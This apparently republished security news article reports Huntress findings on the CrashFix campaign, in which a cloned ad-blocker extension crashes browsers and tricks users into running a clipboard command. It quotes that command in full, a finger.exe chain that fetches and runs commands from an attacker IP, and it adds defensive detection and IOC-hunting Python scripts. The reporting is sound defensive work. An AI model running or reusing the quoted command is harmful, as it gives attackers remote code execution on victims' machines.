
CrashFix Campaign Uses Malicious Browser Extensions to Push Fake Security Warnings

Researchers at Huntress have uncovered a new browser-based social engineering campaign, dubbed “CrashFix”, that abuses a fake ad blocker extension to crash victims’ browsers and trick them into running malicious PowerShell commands.

Malicious “NexShield” Extension Masquerades as uBlock Origin Lite

In January 2026, Huntress Senior Security Operations Analyst Tanner Filip observed a victim whose browser repeatedly froze and then displayed a “CrashFix” pop-up claiming the browser had “stopped abnormally” and needed a scan.

Fake CrashFix pop-up message after “run scan” (Source: Huntress)

The root cause was a Chrome extension called “NexShield Advanced Web Protection,” installed from the official Chrome Web Store.

NexShield is a near one-to-one clone of the legitimate uBlock Origin Lite project by Raymond Hill, including a forged header that falsely credits him and points to a non-existent GitHub repository.

The extension ID is cpcdkmjddocikjdkbbeiaafnpdbdafmi, and the developer email is alaynna6899@gmail.com.

Behind the scenes, NexShield phones home to attacker infrastructure using a typo-squatted domain, nexsnield[.]com.

NexShield header reference (Source: Huntress)

On install, update, and uninstall, it sends beacons with a unique UUID and version information, allowing operators to track every victim and every extension lifecycle event.

A Chrome Alarms timer delays the malicious behavior for about 60 minutes and then repeats it every 10 minutes, reducing the chance that users connect the browser problems to the recent install.

The heart of the CrashFix behavior is a denial-of-service routine inside the extension. It rapidly opens a large number of chrome.runtime ports in a tight loop, exhausting CPU and memory until the browser becomes unresponsive or crashes. Before this happens, a timestamp is saved locally.

When frustrated users force-quit and restart the browser, the extension reads that saved timestamp and opens a 400×600 pop-up window to the attacker’s /whats-new page.

This window displays the fake “CrashFix” security warning, claiming the browser crashed unexpectedly and urging the user to “run a scan.”

If the user follows the instructions, they are told to open the Windows Run dialog (Win+R) and press Ctrl+V.

Without their knowledge, the extension has already copied a malicious PowerShell command to the clipboard. Pasting and pressing Enter silently runs:

cmd /c start "" /min cmd /c "copy %windir%\system32\finger.exe %temp%\ct.exe&%temp%\ct.exe confirm@199.217.98[.]108|cmd"


This copies the built-in finger.exe tool to %temp% as ct.exe, then uses it to pull and execute additional commands from 199.217.98[.]108.

Subsequent stages use obfuscated PowerShell to download and run more payloads, removing temporary files to reduce traces.
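The finger.exe stage above is a living-off-the-land pattern that endpoint telemetry can catch without any signature for the later payloads. The following is an added example, not code from the article or from Huntress: it runs detection logic over a few constructed Sysmon-style process-creation events and flags the three observable steps of the chain, finger.exe being copied out of System32, a renamed copy (PE original name still finger.exe) executing from a user-writable path, and a cmd.exe command line that pipes a user@host finger response into another cmd. The first sample event carries the article's own paste-to-Run command line; the host paths, user name and the benign events are constructed.

```python
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    """Subset of a Sysmon Event ID 1 (process creation) record."""
    image: str           # full path of the new process
    original_name: str   # OriginalFileName from the PE version resource
    cmdline: str
    parent_image: str


SYSTEM32_FINGER = r"c:\windows\system32\finger.exe"

# cmd.exe copying finger.exe anywhere (the %temp%\ct.exe staging step)
COPY_FINGER_RE = re.compile(r"\bcopy\b[^&|]*\\finger\.exe", re.IGNORECASE)
# finger's argument form is user@host; the chain pipes that response into cmd
TARGET_PIPED_TO_CMD_RE = re.compile(r"\S+@[\w.\[\]-]+\s*\|\s*cmd\b", re.IGNORECASE)


def classify(ev: ProcEvent) -> list:
    """Return the list of CrashFix-style findings for one process event."""
    findings = []
    image = ev.image.lower()
    is_cmd = image.endswith("\\cmd.exe")
    is_finger = ev.original_name.lower() == "finger.exe"

    # 1. finger.exe being copied out of System32 by cmd.exe
    if is_cmd and COPY_FINGER_RE.search(ev.cmdline):
        findings.append("finger.exe copied out of System32")
    # 2. a renamed finger.exe: PE name says finger.exe, path is not System32
    if is_finger and image != SYSTEM32_FINGER:
        findings.append("renamed finger.exe executed from " + ev.image)
    # 3. cmd.exe piping a user@host finger response straight into another cmd
    if is_cmd and TARGET_PIPED_TO_CMD_RE.search(ev.cmdline):
        findings.append("finger-style user@host output piped into cmd")
    return findings


def scan(events) -> dict:
    """Map the index of each suspicious event to its findings."""
    hits = {}
    for i, ev in enumerate(events):
        f = classify(ev)
        if f:
            hits[i] = f
    return hits


# Constructed sample events. The command line in the first one is the
# article's paste-to-Run chain; the paths and user name are made up.
SAMPLE_EVENTS = [
    ProcEvent(
        image=r"C:\Windows\System32\cmd.exe", original_name="Cmd.Exe",
        cmdline=r'cmd /c start "" /min cmd /c "copy %windir%\system32\finger.exe '
                r'%temp%\ct.exe&%temp%\ct.exe confirm@199.217.98.108|cmd"',
        parent_image=r"C:\Windows\explorer.exe"),
    ProcEvent(
        image=r"C:\Users\alice\AppData\Local\Temp\ct.exe", original_name="finger.exe",
        cmdline=r"C:\Users\alice\AppData\Local\Temp\ct.exe confirm@199.217.98.108",
        parent_image=r"C:\Windows\System32\cmd.exe"),
    # legitimate use of finger from its normal location: no findings expected
    ProcEvent(
        image=r"C:\Windows\System32\finger.exe", original_name="finger.exe",
        cmdline="finger -l alice@unixhost.example",
        parent_image=r"C:\Windows\System32\cmd.exe"),
    # ordinary copy command: no findings expected
    ProcEvent(
        image=r"C:\Windows\System32\cmd.exe", original_name="Cmd.Exe",
        cmdline=r"cmd /c copy C:\data\report.txt %temp%\report.bak",
        parent_image=r"C:\Windows\explorer.exe"),
]

if __name__ == "__main__":
    for idx, findings in scan(SAMPLE_EVENTS).items():
        print(idx, SAMPLE_EVENTS[idx].image, findings)
```

The second check is the durable one: renaming the binary to ct.exe does not change the OriginalFileName in its version resource, which Sysmon and most EDR products record, so a finger.exe executing from anywhere but System32 is a strong signal on its own.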

KongTuke, the threat actor behind this campaign, clearly prefers corporate targets. If the infected host is domain-joined, the PowerShell chain downloads a WinPython bundle from a Dropbox link and launches a Python script called modes.py.

This script is ModeloRAT, a full-featured Python remote access trojan. ModeloRAT encrypts C2 traffic with RC4, collects extensive system information, establishes persistence through the Run registry key as “MonitoringService,” and can drop and execute EXEs, DLLs, and Python scripts. Its C2 addresses resolve to 170.168.103[.]208 and 158.247.252[.]178 over HTTP, as reported by Huntress.

Junk code padding used to inflate complexity and confuse static analysis tools. (Source: Huntress)

Non-domain (home) systems are pushed through a heavier, multi-layered PowerShell and DGA chain that, during analysis, ultimately returned only TEST PAYLOAD!!!!, suggesting that the branch is still under development or reserved for future use.

IOC / Artifact | What it is in simple terms
--- | ---
cpcdkmjddocikjdkbbeiaafnpdbdafmi | Malicious Chrome extension ID for NexShield
nexsnield[.]com | Attacker’s main server used by the extension for tracking installs and updates
199.217.98[.]108 | Server contacted by finger.exe to fetch and run more commands
170.168.103[.]208 | ModeloRAT command-and-control (C2) server
158.247.252[.]178 | Second ModeloRAT C2 server
HKCU\Software\Microsoft\Windows\CurrentVersion\Run\MonitoringService | Registry entry used to make ModeloRAT start when the user logs in
hxxps://www.dropbox[.]com/scl/fi/6gscgf35byvflw4y6x4i0/b1.zip?rlkey=bk2hvxvw53ggzhbjiftppej50&st=yyxnfu71&dl=1 | Dropbox URL used to download the WinPython bundle that contains ModeloRAT
CPCDKMJDDOCIKJDKBBEIAAFNPDBDAFMI_2025_1116_1842_0.crx (SHA256: c46af9ae6ab0e7567573dbc950a8ffbe30ea848fac90cd15860045fe7640199c) | Chrome extension file
SHA256: c15f44d6abb3a2a882ffdc9b90f7bb5d1a233c0aa183eb765aa8bfba5832c8c6 | ModeloRAT payload (modes.py)
alaynna6899@gmail.com | Email address used to register the malicious NexShield extension
hxxp://temp[.]sh/utDKu/138d2a62b73e89fc4d09416bcefed27e139ae90016ba4493efc5fbf43b66acfa.exe | Unknown payload (aa.exe)
SHA256: fbfce492d1aa458c0ccc8ce4611f0e2d00913c8d51b5016ce60a7f59db67de67 | Core extension script (background.js)
SHA256: 6399c686eba09584bbbb02f31d398ace333a2b57529059849ef97ce7c27752f4 | GateKeeper .NET payload (16933906614.dll)

Organizations should review browser extensions in their environment, block the listed domains and IPs, monitor for unusual use of finger.exe, and hunt for the above persistence and C2 artifacts across endpoints.
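A practical way to act on the IOC table and the hunting advice above is to normalise the published indicators and match them against what endpoints actually report. The following is an added example, not code from the article or from Huntress. The IOC set is the article's table, kept in the defanged form it is printed in; the telemetry it is matched against is constructed for one fictional host (installed extension IDs, Run-key entries, DNS queries, outbound connections and file hashes), and every benign value in it is invented. The Run-key value for MonitoringService is only known by name from the article, so the sample records the key path alone.

```python
import re

# IOCs copied from the article's table, in the defanged form it prints them.
IOCS = {
    "extension_id": ["cpcdkmjddocikjdkbbeiaafnpdbdafmi"],
    "domain": ["nexsnield[.]com"],
    "ip": ["199.217.98[.]108", "170.168.103[.]208", "158.247.252[.]178"],
    "url": [
        "hxxps://www.dropbox[.]com/scl/fi/6gscgf35byvflw4y6x4i0/b1.zip"
        "?rlkey=bk2hvxvw53ggzhbjiftppej50&st=yyxnfu71&dl=1",
        "hxxp://temp[.]sh/utDKu/138d2a62b73e89fc4d09416bcefed27e139ae90016ba4493efc5fbf43b66acfa.exe",
    ],
    "sha256": [
        "c46af9ae6ab0e7567573dbc950a8ffbe30ea848fac90cd15860045fe7640199c",  # .crx
        "c15f44d6abb3a2a882ffdc9b90f7bb5d1a233c0aa183eb765aa8bfba5832c8c6",  # modes.py
        "fbfce492d1aa458c0ccc8ce4611f0e2d00913c8d51b5016ce60a7f59db67de67",  # background.js
        "6399c686eba09584bbbb02f31d398ace333a2b57529059849ef97ce7c27752f4",  # GateKeeper .NET
    ],
    "run_key": [r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\MonitoringService"],
}


def refang(value: str) -> str:
    """Undo the [.] and hxxp defanging so an indicator matches live telemetry."""
    value = value.replace("[.]", ".").replace("[:]", ":")
    return re.sub(r"^hxxp", "http", value, flags=re.IGNORECASE)


def normalise(kind: str, value: str) -> str:
    """Canonical form per IOC kind, applied to both IOCs and observations."""
    value = refang(value.strip()).lower()
    if kind == "run_key":
        # registry tools print the hive either abbreviated or in full
        value = value.replace("/", "\\").replace("hkey_current_user", "hkcu")
    elif kind == "ip":
        value = value.split(":")[0]  # drop a trailing :port from a connection record
    return value


INDEX = {kind: {normalise(kind, v) for v in vals} for kind, vals in IOCS.items()}


def hunt(telemetry: dict) -> list:
    """telemetry maps an IOC kind to the values observed on a host; returns matches."""
    hits = []
    for kind, observed in telemetry.items():
        known = INDEX.get(kind, set())
        for value in observed:
            if normalise(kind, value) in known:
                hits.append({"kind": kind, "observed": value})
    return hits


# Constructed telemetry for one host; the benign entries are invented.
SAMPLE_TELEMETRY = {
    "extension_id": ["aaaabbbbccccddddeeeeffffgggghhhh", "cpcdkmjddocikjdkbbeiaafnpdbdafmi"],
    "run_key": [
        r"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\OneDrive",
        r"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\MonitoringService",
    ],
    "domain": ["www.example.com", "NEXSNIELD.COM"],
    "ip": ["10.0.0.5:443", "170.168.103.208:80"],
    "sha256": ["c15f44d6abb3a2a882ffdc9b90f7bb5d1a233c0aa183eb765aa8bfba5832c8c6"],
}

if __name__ == "__main__":
    for hit in hunt(SAMPLE_TELEMETRY):
        print(hit["kind"], hit["observed"])
```

Only the full Dropbox and temp.sh URLs are indexed, not their hosts, because blocking or alerting on dropbox.com or temp.sh as domains would flag legitimate traffic; the nexsnield[.]com typo-squat is the one domain safe to treat as an indicator on its own.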


The post CrashFix Campaign Uses Malicious Browser Extensions to Push Fake Security Warnings appeared first on Cyber Security News.
